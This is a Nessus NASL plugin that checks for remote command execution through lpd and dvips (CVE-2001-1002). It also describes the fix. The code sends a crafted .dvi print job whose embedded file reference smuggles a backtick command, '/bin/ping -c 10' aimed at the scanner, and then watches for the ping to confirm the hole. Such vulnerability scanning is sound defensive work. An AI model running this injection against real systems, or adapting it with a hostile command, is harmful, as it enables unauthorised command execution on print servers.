#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#

if(description)
{
   script_id(11023);
   script_bugtraq_id(3241);
   script_cve_id("CVE-2001-1002");
   script_version ("$Revision: 1.11 $");
   name["english"] = "lpd, dvips and remote command execution";
   script_name(english:name["english"]);
 
   desc["english"] = "
The remote lpd server calls dvips in insecure mode.
An attacker may use this flaw to execute arbitrary
commands remotely on this host.

Solution : edit the file
/usr/lib/rhs/rhs-printfilters/dvi-to-ps.fpi

and change the line that specifies how 'dvips' is
to be executed from  :
dvips -f $DVIPS_OPTIONS < $TMP_FILE 
to
dvips -R -f $DVIPS_OPTIONS < $TMP_FILE

Risk factor : High";


   script_description(english:desc["english"]);
 
   summary["english"] = "Executes 'ping' on the remote host";
   script_summary(english:summary["english"]);
 
   script_category(ACT_ATTACK);
 
   script_copyright(english:"This script is Copyright (C) 2002 Renaud Deraison");
   script_family(english:"Gain root remotely");
   script_require_ports("Services/lpd", 515);
   script_dependencies("find_service1.nasl");
   exit(0);
}

port = get_kb_item("Services/lpd");
if(!port)port = 515;

if(!get_port_state(port))exit(0);

soc = open_priv_sock_tcp(dport:port);
if(!soc)exit(0);


CR = raw_string(0x0A);
a = raw_string(0x02) +  "lp" + CR;

send(socket:soc, data:a);
r = recv(socket:soc, length:1);
if(!r)exit(0);

if(ord(r))exit(0);


name = get_host_name();
ip = this_host();


len = strlen(ip);
len = len + 26;
len = len % 256;

#
# This is a .dvi file, containing a reference to a postscript file
# called 'ping -c 10 <ourip>'.
#
data = raw_string(0xF7, 0x02, 0x01, 0x83, 0x82, 0xC0,
		  0x1C, 0x3B, 0x00, 0x00, 0x00, 0x00, 0x03, 0xE8,
		  0x1B, 0x20, 0x54, 0x65, 0x58, 0x20, 0x6F, 0x75,
		  0x74, 0x70, 0x75, 0x74, 0x20, 0x32, 0x30, 0x30,
		  0x32, 0x2E, 0x30, 0x36, 0x2E, 0x30, 0x38, 0x3A,
		  0x32, 0x30, 0x30, 0x35, 0x8b, 0x00, 0x00, 0x00,
		  0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		  0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF,
		  0xFF, 0x8D, 0x9F, 0xF2, 0x00, 0x00, 0x8E, 0xA0,
		  0x02, 0x83, 0x33, 0xDA, 0x8D, 0xA0, 0xFD, 0x7C,
		  0xCC, 0x26, 0xEF, len, 0x70, 0x73, 0x66, 0x69,
		  0x6C, 0x65, 0x3D, 0x22, 0x60, 0x2F, 0x62, 0x69,
		  0x6E, 0x2F, 0x70, 0x69, 0x6E, 0x67, 0x20, 0x2D,
		  0x63, 0x20, 0x31, 0x30, 0x20) + ip + 
       raw_string(0x22, 0x8E, 0x9F,
       		 0x18, 0x00, 0x00, 0x8D, 0x92, 0x00, 0xE8, 0x60,
		 0xA3, 0xF3, 0x00, 0x4B, 0xF1, 0x60, 0x79, 0x00,
		 0x0A, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00,
		 0x05, 0x63, 0x6D, 0x72, 0x31, 0x30, 0xAB, 0x31,
		 0x8E, 0x8C, 0xF8, 0x00, 0x00, 0x00, 0x2A, 0x01,
		 0x83, 0x92, 0xC0, 0x1C, 0x3B, 0x00, 0x00, 0x00,
		 0x00, 0x03, 0xE8, 0x02, 0x9B, 0x33, 0xDA, 0x01,
		 0xD5, 0xC1, 0x47, 0x00, 0x02, 0x00, 0x01, 0xF3,
		 0x00, 0x4B, 0xF1, 0x60, 0x79, 0x00, 0x0A, 0x00,
		 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x05, 0x63,
		 0x6D, 0x72, 0x31, 0x30, 0xF9, 0x00, 0x00, 0x00,
		 0xB0, 0x02, 0xDF, 0xDF, 0xDF, 0xDF);

cmd = raw_string(0x03) + string(strlen(data) ," dfA081", name) + CR;
send(socket:soc, data:cmd);
r = recv(socket:soc, length:1);
if ( isnull(r) ) exit(0);
if(ord(r))exit(0);


		  

 send(socket:soc, data:data);
 send(socket:soc, data:raw_string(0));
 r = recv(socket:soc, length:1);
 if ( isnull(r) ) exit(0);
 if(ord(r))exit(0);
 
 
 cmd = string("Hlocal", CR, "Prenaud", CR, "fdfA081", name, CR,
 "UdfA081",name, CR, "Nsploit.dvi", CR);
 cmd1 = raw_string(0x02) + string(strlen(cmd), " cfA081", name) + CR;
 send(socket:soc, data:cmd1);
 
 r = recv(socket:soc, length:1);
 if ( isnull(r) ) exit(0);
 if(ord(r))exit(0);
 
 
 send(socket:soc, data:cmd);
 send(socket:soc, data:raw_string(0));
 r = recv(socket:soc, length:1);
 close(soc);
 
 #
 # We asked the remote host to execute '/bin/ping -c 10 <us>'. We now
 # wait for the reply.
 #
 filter = string("icmp and src host ", get_host_ip(), " and dst host ", ip, " and icmp[0] = 8");
 pkt = pcap_next(pcap_filter:filter);

 if(pkt)security_hole(port);
